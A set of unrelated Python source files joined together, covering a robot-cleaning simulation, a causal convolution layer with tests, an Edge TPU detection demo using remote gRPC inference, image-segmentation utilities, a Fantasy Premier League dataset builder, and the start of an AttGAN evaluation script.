# if self.room.isTileCleaned(int(x), int(y)) is False:
# self.room.cleanTileAtPosition(self.r_position)
# robot_position = Position(x, y)
# robot_position = robot_position.getNewPosition(self.r_direction, speed)
# # print('y', robot_position.getY())
# # print('x', robot_position.getX())
# speed += 0.01
# speed_timer += 0.01
# cy = robot_position.getY()
# cx = robot_position.getX()
# if cy <= 0:
# self.setRobotPosition(Position(robot_position.getX(), 0))
# self.r_direction = random.randrange(0, 360)
# speed = 0.01
# elif cy >= self.room.height:
# self.setRobotPosition(Position(robot_position.getX(), self.room.height))
# self.r_direction = random.randrange(0, 360)
# speed = 0.01
# if cx <= 0:
# self.setRobotPosition(Position(0, robot_position.getY()))
# self.r_direction = random.randrange(0, 360)
# speed = 0.01
# elif cx >= self.room.width:
# self.setRobotPosition(Position(self.room.width, robot_position.getY()))
# self.r_direction = random.randrange(0, 360)
# speed = 0.01
# # print(type(robot_position))
# self.setRobotDirection(random.randrange(0, 360))
# self.setRobotPosition(robot_position)
# === Problem 4
#
# 1) How long does it take to clean 80% of a 20�20 room with each of 1-10 robots?
#
# 2) How long does it take two robots to clean 80% of rooms with dimensions
# 20�20, 25�16, 40�10, 50�8, 80�5, and 100�4?
def showPlot1():
"""
Produces a plot showing dependence of cleaning time on number of robots.
"""
xAxis = []
yAxis = []
for num_r in range(1, 11):
xAxis.append(num_r)
yAxis.append(runSimulation(num_r, 1.0, 20, 20, .8, 25, StandardRobot))
pylab.title('Plot 1')
pylab.xlabel('Number of Robots')
# pylab.semilogy()
pylab.ylabel('Mean Time')
pylab.plot(xAxis, yAxis)
pylab.show()
# showPlot1()
def showPlot2(title, x_label, y_label):
"""
Produces a plot showing dependence of cleaning time on room shape.
"""
# aspect_ratios = []
# times1 = []
# times2 = []
# for width in [40, 20, 25, 50, 80, 100]:
# height = int(400 / width)
# print("Plotting cleaning time for a room of width:", width, "by height:", height)
# aspect_ratios.append(float(width) / height)
# times1.append(runSimulation(2, 1.0, width, height, 0.8, 200, StandardRobot))
# # print('d')
# # times2.append(runSimulation(2, 1.0, width, height, 0.8, 200, RandomWalkRobot))
# pylab.plot(aspect_ratios, times1)
# print(times1)
# # pylab.plot(aspect_ratios, times2)
# # print(times2)
#
# pylab.title(title)
# pylab.legend(('StandardRobot', 'RandomWalkRobot'))
# pylab.xlabel(x_label)
# pylab.ylabel(y_label)
# pylab.show()
num_r = 2
room_size = [(20, 20), (25, 16), (40, 10), (50, 8), (80, 5), (100, 4)]
yAxis = []
# yAxis2 = []
xAxis = []
for size in room_size:
yAxis.append(runSimulation(num_r, 1.0, size[0], size[1], 0.8, 100, StandardRobot))
xAxis.append(size[0]/size[1])
# yAxis2.append(runSimulation(2, 1.0, size[0], size[1], 0.8, 200, RandomWalkRobot))
# pylab.legend(('StandardRobot', 'RandomWalkRobot'))
pylab.ylabel('Mean Time')
pylab.xlabel('Ratio of Width to Height')
pylab.title('Plot 2')
print(yAxis)
# pylab.plot(xAxis, yAxis2)
pylab.plot(xAxis, yAxis)
pylab.show()
# === Problem 5
# print('result', runSimulation(1, 1.0, 10, 10, 0.9, 100, StandardRobot))
# === Problem 6
# For the parameters tested below (cleaning 80% of a 20x20 square room),
# RandomWalkRobots take approximately twice as long to clean the same room as
# StandardRobots do.
def showPlot3():
"""
Produces a plot comparing the two robot strategies.
"""
min_cov = 0.9
num_bots = 1
trials = 100
room_sizes = [(1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (10, 10)]
speed = 1.0
r_yAxis = []
s_yAxis = []
xAxis = [x[0]*x[1] for x in room_sizes]
for x in room_sizes:
r_yAxis.append(runSimulation(num_bots, speed, x[0], x[1], min_cov, trials, RandomWalkRobot))
s_yAxis.append(runSimulation(num_bots, speed, x[0], x[1], min_cov, trials, StandardRobot))
# Random Walk
# Standard Walk
pylab.title('Random Walk vs. Standard Walk')
pylab.xlabel('Area of Room')
pylab.ylabel('Mean Time')
pylab.plot(xAxis, s_yAxis, 'b^', label='standard')
pylab.plot(xAxis, r_yAxis, 'g--', label='random')
pylab.legend()
pylab.show()
# showPlot3()
showPlot2('Time to clean 80% of a 400-tile room for various room shapes',
'Aspect Ratio',
'Time / steps') |
import torch
import torch.nn as nn
import torch.nn.functional as F
class CausalConv1d(nn.Conv1d):
def __init__(self,
input_size,
hidden_size,
kernel_size,
stride=1,
dilation=1,
groups=1,
bias=True,
sigmoid=None,
tanh=None):
self.left_padding = (kernel_size - 1) * dilation
super(CausalConv1d, self).__init__(
input_size,
hidden_size,
kernel_size,
stride=stride,
padding=0,
dilation=dilation,
groups=groups,
bias=bias)
def forward(self, input):
# data is in shape (timesteps, batches, features)
# conv needs shape (batches, features, timesteps)
x = F.pad(input.permute(1, 2, 0), (self.left_padding,0))
conv_out = super(CausalConv1d, self).forward(x)
# must return shape (timesteps, batches, features)
return conv_out.permute(2, 0, 1)
class Wave(nn.Module):
def __init__(self, input_size, hidden_size, layers=3, activation="tanh"):
super(Wave, self).__init__()
self.layers = []
prev_size = input_size
for layer in range(layers):
conv = CausalConv1d(prev_size, hidden_size, kernel_size=2, dilation=2**layer)
self.layers.append(conv)
self.add_module("layer"+str(layer), conv)
prev_size = hidden_size
def forward(self, data):
for layer in self.layers:
data = layer(data)
return data
class ShortWave(nn.Module):
def __init__(self, input_size, hidden_size, layers=3):
super(ShortWave, self).__init__()
self.layers = []
prev_size = input_size
for layer in range(layers):
conv = CausalConv1d(prev_size, hidden_size, kernel_size=2, dilation=1)
self.layers.append(conv)
self.add_module("layer"+str(layer), conv)
prev_size = hidden_size
def forward(self, data):
for layer in self.layers:
data = layer(data)
return data
def test_CausalConv1d(timesteps, input_size, hidden_size, batch_size, kernel_size, dilation, bias):
m = CausalConv1d(input_size, hidden_size, kernel_size=kernel_size, dilation=dilation, bias=bias!=0)
m.weight.data.fill_(1)
if bias:
m.bias.data.fill_(bias)
x = torch.autograd.Variable(torch.zeros(timesteps, batch_size, input_size), requires_grad=False)
for batch in range(batch_size):
for t in range(timesteps):
for ci in range(input_size):
x.data.fill_(0)
x[t, batch, ci] = 1
out = m(x)
for b in range(batch_size):
for co in range(hidden_size):
if b == batch:
target = [1+bias if j in range(t, t+k*d, d) else bias for j in range(timesteps)]
else:
target = [bias for j in range(timesteps)]
if list(out[:, b, co].data) != target:
print("\nCausalConv1d wrong output for kernel_size", k,
"and dilation", d, "i", input_size, "out", hidden_size,
"batch_size", batch_size,
"bias", bias)
print("input ", " ".join(str(int(el)) for el in x[:, b, co].data))
print("output", " ".join(str(el) for el in out[:, b, co].data))
print("target", " ".join(str(el) for el in target))
assert list(out[:, b, co].data) == target, "Test failed"
if __name__ == "__main__":
import numpy as np
timesteps, batch_size = 20, 3
print("Running tests", end="")
for ci in range(1, 3):
for co in range(1, 3):
for k in range(1, 4):
for d in range(1, 3):
print(".", end="", flush=True)
test_CausalConv1d(timesteps, ci, co, batch_size, k, d, 0.5)
test_CausalConv1d(timesteps, ci, co, batch_size, k, d, 0)
print("\nCausalConv1d tests passed")
|
<reponame>sundararajan20/edgetpuvision<filename>edgetpuvision/detect.py
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A demo which runs object detection on camera frames.
export TEST_DATA=/usr/lib/python3/dist-packages/edgetpu/test_data
Run face detection model:
python3 -m edgetpuvision.detect \
--model ${TEST_DATA}/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite
Run coco model:
python3 -m edgetpuvision.detect \
--model ${TEST_DATA}/mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite \
--labels ${TEST_DATA}/coco_labels.txt
"""
import argparse
import colorsys
import itertools
import time
from pycoral.adapters import detect
from pycoral.utils import edgetpu
import svg
import utils
from apps import run_app
import io
import numpy as np
import grpc
import inferencedata_pb2
import inferencedata_pb2_grpc
from PIL import Image
channel = None
stub = None
CSS_STYLES = str(svg.CssStyle({'.back': svg.Style(fill='black',
stroke='black',
stroke_width='0.5em'),
'.bbox': svg.Style(fill_opacity=0.0,
stroke_width='0.1em')}))
def size_em(length):
return '%sem' % str(0.6 * (length + 1))
def color(i, total):
return tuple(int(255.0 * c) for c in colorsys.hsv_to_rgb(i / total, 1.0, 1.0))
def make_palette(keys):
return {key : svg.rgb(color(i, len(keys))) for i, key in enumerate(keys)}
def make_get_color(color, labels):
if color:
return lambda obj_id: color
if labels:
palette = make_palette(labels.keys())
return lambda obj_id: palette[obj_id]
return lambda obj_id: 'white'
def overlay(title, objs, get_color, labels, inference_time, inference_rate, layout):
x0, y0, width, height = layout.window
font_size = 0.03 * height
defs = svg.Defs()
defs += CSS_STYLES
doc = svg.Svg(width=width, height=height,
viewBox='%s %s %s %s' % layout.window,
font_size=font_size, font_family='monospace', font_weight=500)
doc += defs
for obj in objs:
percent = int(100 * obj.score)
if labels:
caption = '%d%% %s' % (percent, labels[obj.id])
else:
caption = '%d%%' % percent
color = get_color(obj.id)
inference_width, inference_height = layout.inference_size
bbox = obj.bbox.scale(1.0 / inference_width, 1.0 / inference_height).scale(*layout.size)
x, y, w, h = bbox.xmin, bbox.ymin, bbox.width, bbox.height
doc += svg.Rect(x=x, y=y, width=w, height=h,
style='stroke:%s' % color, _class='bbox')
doc += svg.Rect(x=x, y=y+h ,
width=size_em(len(caption)), height='1.2em', fill=color)
t = svg.Text(x=x, y=y+h, fill='black')
t += svg.TSpan(caption, dy='1em')
doc += t
ox = x0 + 20
oy1, oy2 = y0 + 20 + font_size, y0 + height - 20
# Title
if title:
doc += svg.Rect(x=0, y=0, width=size_em(len(title)), height='1em',
transform='translate(%s, %s) scale(1,-1)' % (ox, oy1), _class='back')
doc += svg.Text(title, x=ox, y=oy1, fill='white')
# Info
lines = [
'Objects: %d' % len(objs),
'Inference time: %.2f ms (%.2f fps)' % (inference_time * 1000, 1.0 / inference_time)
]
for i, line in enumerate(reversed(lines)):
y = oy2 - i * 1.7 * font_size
doc += svg.Rect(x=0, y=0, width=size_em(len(line)), height='1em',
transform='translate(%s, %s) scale(1,-1)' % (ox, y), _class='back')
doc += svg.Text(line, x=ox, y=y, fill='white')
return str(doc)
def print_results(inference_rate, objs):
print('\nInference (rate=%.2f fps):' % inference_rate)
for i, obj in enumerate(objs):
print(' %d: %s, area=%.2f' % (i, obj, obj.bbox.area))
def render_gen(args, stub):
fps_counter = utils.avg_fps_counter(30)
interpreters, titles = utils.make_interpreters(args.model)
assert utils.same_input_image_sizes(interpreters)
interpreters = itertools.cycle(interpreters)
interpreter = next(interpreters)
labels = utils.load_labels(args.labels) if args.labels else None
labels_to_ids = dict(zip(labels.values(), labels.keys()))
filtered_labels = set(l.strip() for l in args.filter.split(',')) if args.filter else None
get_color = make_get_color(args.color, labels)
draw_overlay = True
width, height = utils.input_image_size(interpreter)
yield width, height
output = None
while True:
tensor, layout, command = (yield output)
inference_rate = next(fps_counter)
if draw_overlay:
start = time.monotonic()
try:
reshaped = np.reshape(tensor, (300, 300, 3))
img = Image.fromarray(reshaped)
img_byte_arr = io.BytesIO()
img.save(img_byte_arr, format='JPEG')
imagebatch = inferencedata_pb2.ImageBatch()
for i in range(1):
imagepb = imagebatch.images.add()
imagepb.id = i + 1
imagepb.image_data = img_byte_arr.getvalue()
response = stub.Infer(imagebatch)
# print(response)
# edgetpu.run_inference(interpreter, tensor)
# objs = [
# detect.Object(labels_to_ids[box.label],
# box.label,
# detect.BBox(box.xmin, box.ymin, box.xmax, box.ymax))
# for result in response.results for box in result.boxes if (box.score > args.threshold and box.label in filtered_labels)
# ]
objs = []
for result in response.results:
for box in result.boxes:
if box.score > args.threshold and box.label in filtered_labels:
objs.append(detect.Object(labels_to_ids[box.label], box.score, detect.BBox(box.xmin, box.ymin, box.xmax, box.ymax)))
except Exception as e:
print(e)
inference_time = time.monotonic() - start
# objs = detect.get_objects(interpreter, args.threshold)[:args.top_k]
# if labels and filtered_labels:
# objs = [obj for obj in objs if labels[obj.id] in filtered_labels]
# objs = []
objs = [obj for obj in objs \
if args.min_area <= obj.bbox.scale(1.0 / width, 1.0 / height).area <= args.max_area]
if args.print:
print_results(inference_rate, objs)
title = titles[interpreter]
output = overlay(title, objs, get_color, labels, inference_time, inference_rate, layout)
else:
output = None
if command == 'o':
draw_overlay = not draw_overlay
elif command == 'n':
print("'n' doesn't work with remote inference")
# interpreter = next(interpreters)
def add_render_gen_args(parser):
parser.add_argument('--model',
help='.tflite model path', required=True)
parser.add_argument('--labels',
help='labels file path')
parser.add_argument('--top_k', type=int, default=50,
help='Max number of objects to detect')
parser.add_argument('--threshold', type=float, default=0.1,
help='Detection threshold')
parser.add_argument('--min_area', type=float, default=0.0,
help='Min bounding box area')
parser.add_argument('--max_area', type=float, default=1.0,
help='Max bounding box area')
parser.add_argument('--filter', default=None,
help='Comma-separated list of allowed labels')
parser.add_argument('--color', default=None,
help='Bounding box display color'),
parser.add_argument('--print', default=False, action='store_true',
help='Print inference results')
def main():
run_app(add_render_gen_args, render_gen)
if __name__ == '__main__':
main()
|
import numpy as np
from matplotlib import pyplot as plt
from keras.callbacks import Callback
from functools import reduce
import pyvips as Vips
import random
format_to_dtype = {
'uchar': np.uint8,
'char': np.int8,
'ushort': np.uint16,
'short': np.int16,
'uint': np.uint32,
'int': np.int32,
'float': np.float32,
'double': np.float64,
'complex': np.complex64,
'dpcomplex': np.complex128,
}
def vips_to_np(im):
return np.frombuffer(im.write_to_memory(), dtype=format_to_dtype[im.format]).reshape(im.height,im.width,im.bands)
class Previewer(Callback):
def __init__(self, generator, number_of_images=2,save_path=None):
super()
self.generator = generator
self.number_of_images = number_of_images
self.save_path = save_path
def on_epoch_end(self, epoch, logs={}):
fig = preview_model(self.model, self.generator, self.number_of_images)
if self.save_path:
fig.savefig(self.save_path.format(epoch))
def preview_model(model, generator, images, weights_path=None, labels=False):
if weights_path != None:
model.load_weights(weights_path)
n_images = len(images) if type(images) == list else images
rs=list(range(generator.images[0].total_frames))
fig, axarr = plt.subplots(n_images,3,figsize=(20,6*n_images))
n=0
test_ids=images if type(images) == list else []
test_images=[generator.images[0].get_single(i) for i in test_ids]
while len(test_images) < n_images:
i=random.choice(rs)
orig=generator.images[0].get_single(i)
if orig.mean() > 230:
continue
test_ids += [i]
test_images += [orig]
n+=1
predictions=model.predict(np.asarray(test_images))
for n,i in enumerate(test_ids):
predicted=predictions[n].reshape((generator.output_shape[0],generator.output_shape[1],generator.classes))
axarr[n][0].imshow(np.argmax(predicted,axis=2),vmax=4,vmin=0,cmap='hot')
axarr[n][1].imshow(test_images[n])
axarr[n][2].imshow(np.argmax(generator.images[0].mask.get(i),axis=2),vmax=4,vmin=0,cmap='hot')
if labels:
axarr[n][0].set_title(str(i))
axarr[n][1].set_title(str(i))
axarr[n][2].set_title(str(i))
plt.show()
return fig
def to_categorical(im, n_features=0):
if (n_features == 0):
hist = im.hist_find()
if hist(0,0)+hist(hist.width-1,0) == im.width*im.height:
n_features = 2
return im, n_features
else:
for n in range(hist.width):
c = hist(n,0)
if c != [0.0]:
n_features = n+1
categorical = im == 0
for klass in range(1,n_features):
categorical = categorical.bandjoin(im == int(klass))
return categorical, n_features
def flatten(image,n):
return ((image/255.0)*n).cast('uchar')
def from_categorical(im):
template = im.bandsplit()[1:im.bands]
bands = im.bands-1
for band in range(bands):
template[band] = reduce(lambda a,b: a&~b,[template[i] for i in range(bands) if i!=band],template[band])
result = Vips.Image.black(im.width,im.height)
for band in range(0, bands):
result |= flatten(template[band],band+1)
return result
def resize_indexed(im,width,height):
cat_image=to_categorical(im)[0]
cat_image_resized = resize_categorical(cat_image,width,height)
return from_categorical(cat_image_resized)
def resize_categorical(cat_image,width,height):
reducer = lambda a,b: a.bandjoin(b.resize(width/cat_image.width,vscale=height/cat_image.height)>=63)
return reduce(reducer,cat_image.bandsplit())
def show_vips_im(im):
plt.figure(figsize=(40,40))
plt.imshow(vips_to_np(im))
def show_np_im(im):
plt.figure(figsize=(40,40))
plt.imshow(im)
|
#!/usr/bin/env python
# coding: utf-8
# ### Create player training dataset for player model
#
# - Get all able players, loop through their history, append game features of those games
# - Recieve the predicted scoreline to make dataset ready for prediction
# In[1]:
import numpy as np
import pandas as pd
pd.options.display.max_rows = None
import requests
pd.set_option('display.max_columns', None)
# In[91]:
class player():
def __init__(self,data,gameweek_index = 39):
#get gameweek index to see which gameweek should be used for prediction and up until what gameweek for training
self.results = data
self.gameweek_index = gameweek_index -1
self.train()
def train(self):
self.get_able_players()
self.make_player_dataset()
self.organise()
self.receive_scoreline()
self.label_data()
def get_able_players(self):
# Get the players which are avaialble for selection
# @param none
# @return none
url = 'https://fantasy.premierleague.com/api/bootstrap-static/'
r = requests.get(url)
json = r.json()
stats_df = pd.DataFrame(json['element_stats'])
elements_df = pd.DataFrame(json['elements'])
del elements_df["chance_of_playing_next_round"]
del elements_df["chance_of_playing_this_round"]
del elements_df["cost_change_event"]
del elements_df["cost_change_event_fall"]
del elements_df["cost_change_start"]
del elements_df["cost_change_start_fall"]
del elements_df["dreamteam_count"]
del elements_df["transfers_in"]
del elements_df["transfers_in_event"]
del elements_df["transfers_out"]
del elements_df["transfers_out_event"]
del elements_df["photo"]
del elements_df["in_dreamteam"]
del elements_df["news"]
del elements_df["form"]
del elements_df["code"]
del elements_df["first_name"]
del elements_df["news_added"]
del elements_df["special"]
del elements_df["corners_and_indirect_freekicks_order"]
del elements_df["corners_and_indirect_freekicks_text"]
del elements_df["direct_freekicks_order"]
del elements_df["direct_freekicks_text"]
del elements_df["penalties_order"]
del elements_df["penalties_text"]
del elements_df["ict_index_rank_type"]
del elements_df["ict_index_rank"]
del elements_df["creativity_rank_type"]
del elements_df["creativity_rank"]
del elements_df["influence_rank"]
del elements_df["influence_rank_type"]
del elements_df["threat_rank"]
del elements_df["threat_rank_type"]
del elements_df["value_season"]
all_players_df = elements_df
self.all_players_df = all_players_df[all_players_df.status != "u"]
def make_player_dataset(self):
#Method to make the player training dataset - loop through each players history annd append features
#@params None
#@return None
dataset = self.all_players_df
dataset["goals_per_90"] = 0.0
dataset["assists_per_90"] = 0.0
dataset["clean_sheets_per_90"] = 0.0
dataset["goals_conceded_per_90"] = 0.0
dataset["points_pg"] = 0.0
dataset["minutes_last3"] = 0.0
dataset["bonus_last5"] = 0.0
train_df = pd.DataFrame()
dataset = dataset[dataset["minutes"] != 0]
for index,row in dataset.iterrows():
#grab the player information of each player in the dataset
player_id = dataset["id"][index]
url = 'https://fantasy.premierleague.com/api/element-summary/' + str(int(player_id)) + "/"
r = requests.get(url)
json = r.json()
player_history_df = pd.DataFrame(json["history"])
del player_history_df["fixture"]
del player_history_df["opponent_team"]
del player_history_df["kickoff_time"]
del player_history_df["round"]
del player_history_df["own_goals"]
del player_history_df["penalties_saved"]
del player_history_df["penalties_missed"]
del player_history_df["yellow_cards"]
del player_history_df["red_cards"]
del player_history_df["saves"]
del player_history_df["value"]
del player_history_df["bps"]
del player_history_df["transfers_balance"]
del player_history_df["selected"]
del player_history_df["transfers_in"]
del player_history_df["transfers_out"]
del player_history_df["element"]
player_history_df["points_gained"] = 0
player_history_df.insert(loc=0, column='element_type', value=0)
goals, assists, clean_sheets, minutes, points, goals_conceded= 0,0,0,0,0,0
point_form = []
split = self.gameweek_index
for _index,_row in player_history_df[:split].iterrows():
goals_x = player_history_df["goals_scored"][_index]
goals += goals_x
assists_x = player_history_df["assists"][_index]
assists += assists_x
clean_sheets_x = player_history_df["clean_sheets"][_index]
clean_sheets += clean_sheets_x
goals_conceded_x= player_history_df["goals_conceded"][_index]
goals_conceded += goals_conceded_x
minutes_x = player_history_df["minutes"][_index]
minutes += minutes_x
points_x = player_history_df["total_points"][_index]
points += points_x
point_form.append(points_x)
player_history_df.at[_index,"points_pg"] = sum(point_form) / len(point_form)
player_history_df.at[_index,"element_type"] = dataset["element_type"][index]
player_history_df.at[_index,"points_gained"] = player_history_df["total_points"][_index]
#loop through again given we have the full point form
matches_index={}
i = 0
for _index, _row in player_history_df[:split].iterrows():
if i >= 5:
player_history_df.at[_index, "pointslast1"] = point_form[i-1]
player_history_df.at[_index, "pointslast3"] = sum(point_form[i-3:i])
player_history_df.at[_index, "pointslast5"] = sum(point_form[i-5:i])
i += 1
del player_history_df["total_points"]
#add the last recent form to the prediction model, to have the last match, last 3 and last 5 form
dataset.at[index, "pointslast1"] = point_form[-1]
dataset.at[index, "pointslast3"] = sum(point_form[-3:])
dataset.at[index, "pointslast5"] = sum(point_form[-5:])
train_df = train_df.append(player_history_df,ignore_index= True)
#if no minutes played in a match, remove record
if minutes > 0:
dataset.at[index,"goals_per_90"] = (goals / minutes) * 90
dataset.at[index,"assists_per_90"] = (assists / minutes) * 90
dataset.at[index,"clean_sheets_per_90"] = (clean_sheets / minutes) * 90
dataset.at[index,"goals_conceded_per_90"] = (goals_conceded / minutes) * 90
dataset.at[index,"points_pg"] = (points/len(player_history_df))
else:
dataset = dataset.drop(index)
#Calculate predicted minutes and bonus by averaging out the number of minutes in the last 5
last_3_mins = 0
last_5_bonus = 0
for i,r in player_history_df[-3:split].iterrows():
mins = player_history_df["minutes"][i]
last_3_mins += mins
for i,r in player_history_df[-5:split].iterrows():
bonus = player_history_df["bonus"][i]
last_5_bonus += bonus
dataset.at[index, "minutes_last3"] = (last_3_mins / 3)
dataset.at[index, "bonus_last5"] = (last_5_bonus / 5)
#Calculate influence, creativity and threat per game by dividig by total No of Games
influence = float(dataset["influence"][index])
creativity = float(dataset["creativity"][index])
threat = float(dataset["threat"][index])
dataset.at[index, "influence"] = influence / len(player_history_df)
dataset.at[index, "creativity"] = creativity / len(player_history_df)
dataset.at[index, "threat"] = threat / len(player_history_df)
player_history_df= player_history_df[player_history_df['minutes'] != 0]
del dataset["ep_next"]
del dataset["ep_this"]
del dataset["event_points"]
del dataset["id"]
del dataset["second_name"]
del dataset["points_per_game"]
del dataset["selected_by_percent"]
del dataset["squad_number"]
del dataset["status"]
del dataset["total_points"]
del dataset["goals_scored"]
del dataset["assists"]
del dataset["clean_sheets"]
del dataset["goals_conceded"]
del dataset["own_goals"]
del dataset["penalties_saved"]
del dataset["penalties_missed"]
del dataset["yellow_cards"]
del dataset["red_cards"]
del dataset["bonus"]
del dataset["bps"]
del dataset["saves"]
del dataset["value_form"]
del dataset["ict_index"]
del dataset["minutes"]
del dataset["now_cost"]
del train_df["ict_index"]
#change was_home column from boolean value to int value
train_df["was_home"] = train_df["was_home"]*1
#remove any columns with NaN values
train_df = train_df.dropna()
self.all_players_df = dataset
self.train_df = train_df
def organise(self):
#Method to organise dataframes so they are the same for training and predicting
#@params None
#@return None
self.all_players_df = self.all_players_df[["element_type",
"team",
"web_name",
"minutes_last3",
"goals_per_90",
"assists_per_90",
"clean_sheets_per_90",
"goals_conceded_per_90",
"bonus_last5",
"influence",
"creativity",
"threat",
"points_pg",
"pointslast1",
"pointslast3",
"pointslast5"]]
self.train_df = self.train_df[['element_type',
'was_home',
'team_h_score',
'team_a_score',
'minutes',
'goals_scored',
'assists',
'clean_sheets',
'goals_conceded',
'bonus',
'influence',
'creativity',
'threat',
'points_pg',
'pointslast1',
'pointslast3',
'pointslast5',
'points_gained']]
def receive_scoreline(self):
#Method to append scoreline from Fixture Model to data
#@params None
#@return None
dataset = self.all_players_df
results = self.results
teams = []
dataset.insert(loc=1, column='team_a_score', value=0)
dataset.insert(loc=1, column='team_h_score', value=0)
dataset.insert(loc=1, column='was_home', value=0)
for index,row in dataset.iterrows():
team_code = dataset["team"][index]
for _index, _row in results.iterrows():
teamh = results["team H"][_index]
teama = results["team A"][_index]
if team_code == teamh:
dataset.at[index, "was_home"] = 1
dataset.at[index, "team_h_score"] = results["team_h_score"][_index]
dataset.at[index, "team_a_score"] = results["team_a_score"][_index]
elif team_code == teama:
dataset.at[index, "was_home"] = 0
dataset.at[index, "team_h_score"] = results["team_h_score"][_index]
dataset.at[index, "team_a_score"] = results["team_a_score"][_index]
for index,row in results.iterrows():
teamh = results["team H"][index]
teama = results["team A"][index]
teams.append(teamh)
teams.append(teama)
missed =[]
for i in range(1,21):
if i not in teams:
missed.append(i)
#drop missed fixtures which didnt have a scoreline
for each in missed:
dataset= dataset[dataset.team != each]
self.dataset = dataset
self.dataset = self.dataset.dropna()
def label_data(self):
#1 = 0 points
#2 = 1 points
#3 = 2 points
#4 = 3 points
#5 = 4 points
#6 = 5 points
#7 = 6 points
#8 = 7 points
#9 = 8-9 points
#10 = 10-11 points
#11 = 12-14 points
#12 = 15+ points
player_results_df = self.train_df.copy()
player_results_df["label"] = 0
for index, row in player_results_df.iterrows():
points = player_results_df["points_gained"][index]
if points < 0:
player_results_df.at[index,"label"] = 1
elif points == 0:
player_results_df.at[index,"label"] = 2
elif points == 1:
player_results_df.at[index,"label"] = 3
elif points == 2:
player_results_df.at[index,"label"] = 4
elif points == 3:
player_results_df.at[index,"label"] = 5
elif points == 4:
player_results_df.at[index,"label"] = 6
elif points == 5:
player_results_df.at[index,"label"] = 7
elif points == 6:
player_results_df.at[index,"label"] = 8
elif points == 7:
player_results_df.at[index,"label"] = 9
elif points == 8 or points == 9:
player_results_df.at[index,"label"] = 10
elif points == 10 or points == 11:
player_results_df.at[index,"label"] = 11
elif points == 12 or points == 13 or points == 14:
player_results_df.at[index,"label"] = 12
elif points > 12:
player_results_df.at[index,"label"] = 13
del player_results_df["points_gained"]
self.player_results_df = player_results_df
# In[ ]:
|
<filename>model_zoo/research/cv/AttGAN/eval.py
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Entry point for testing AttGAN network"""
import argparse
import json
import math
import os
from os.path import join
import numpy as np
from PIL import Image
import mindspore.common.dtype as mstype
import mindspore.dataset as de
from mindspore import context, Tensor, ops
from mindspore.train.serialization import load_param_into_net
from src.attgan import Genc, Gdec
from src.cell import init_weights
from src.data import check_attribute_conflict
from src.data import get_loader, Custom
from src.helpers import Progressbar
from src.utils import resume_model, denorm
device_id = int(os.getenv('DEVICE_ID'))
context.set_context(mode=context.PYNATIVE_MODE, device_target="Ascend", save_graphs=False, device_id=device_id)
def parse(arg=None):
"""Define configuration of Evaluation"""
parser = argparse.ArgumentParser()
parser.add_argument('--experiment_name', dest='experiment_name', required=True)
parser.add_argument('--test_int', dest='test_int', type=float, default=1.0)
parser.add_argument('--num_test', dest='num_test', type=int)
parser.add_argument('--enc_ckpt_name', type=str, default='')
parser.add_argument('--dec_ckpt_name', type=str, default='')
parser.add_argument('--custom_img', action='store_true')
parser.add_argument('--custom_data', type=str, default='../data/custom')
parser.add_argument('--custom_attr', type=str, default='../data/list_attr_custom.txt')
parser.add_argument('--shortcut_layers', dest='shortcut_layers', type=int, default=1)
parser.add_argument('--inject_layers', dest='inject_layers', type=int, default=1)
return parser.parse_args(arg)
args_ = parse()
print(args_)
with open(join('output', args_.experiment_name, 'setting.txt'), 'r') as f:
args = json.load(f, object_hook=lambda d: argparse.Namespace(**d))
args.test_int = args_.test_int
args.num_test = args_.num_test
args.enc_ckpt_name = args_.enc_ckpt_name
args.dec_ckpt_name = args_.dec_ckpt_name
args.custom_img = args_.custom_img
args.custom_data = args_.custom_data
args.custom_attr = args_.custom_attr
args.shortcut_layers = args_.shortcut_layers
args.inject_layers = args_.inject_layers
args.n_attrs = len(args.attrs)
args.betas = (args.beta1, args.beta2)
print(args)
# Data loader
if args.custom_img:
output_path = join("output", args.experiment_name, "custom_testing")
os.makedirs(output_path, exist_ok=True)
test_dataset = Custom(args.custom_data, args.custom_attr, args.attrs)
test_len = len(test_dataset)
else:
output_path = join("output", args.experiment_name, "sample_testing")
os.makedirs(output_path, exist_ok=True)
test_dataset = get_loader(args.data_path, args.attr_path,
selected_attrs=args.attrs,
mode="test"
)
test_len = len(test_dataset)
dataset_column_names = ["image", "attr"]
num_parallel_workers = 8
ds = de.GeneratorDataset(test_dataset, column_names=dataset_column_names,
num_parallel_workers=min(32, num_parallel_workers))
ds = ds.batch(1, num_parallel_workers=min(8, num_parallel_workers), drop_remainder=False)
test_dataset_iter = ds.create_dict_iterator()
if args.num_test is None:
print('Testing images:', test_len)
else:
print('Testing images:', min(test_len, args.num_test))
# Model loader
genc = Genc(mode='test')
gdec = Gdec(shortcut_layers=args.shortcut_layers, inject_layers=args.inject_layers, mode='test')
# Initialize network
init_weights(genc, 'KaimingUniform', math.sqrt(5))
init_weights(gdec, 'KaimingUniform', math.sqrt(5))
para_genc, para_gdec = resume_model(args, genc, gdec, args.enc_ckpt_name, args.dec_ckpt_name)
load_param_into_net(genc, para_genc)
load_param_into_net(gdec, para_gdec)
progressbar = Progressbar()
it = 0
for data in test_dataset_iter:
img_a = data["image"]
att_a = data["attr"]
if args.num_test is not None and it == args.num_test:
break
att_a = Tensor(att_a, mstype.float32)
att_b_list = [att_a]
for i in range(args.n_attrs):
clone = ops.Identity()
tmp = clone(att_a)
tmp[:, i] = 1 - tmp[:, i]
tmp = check_attribute_conflict(tmp, args.attrs[i], args.attrs)
att_b_list.append(tmp)
samples = [img_a]
for i, att_b in enumerate(att_b_list):
att_b_ = (att_b * 2 - 1) * args.thres_int
if i > 0:
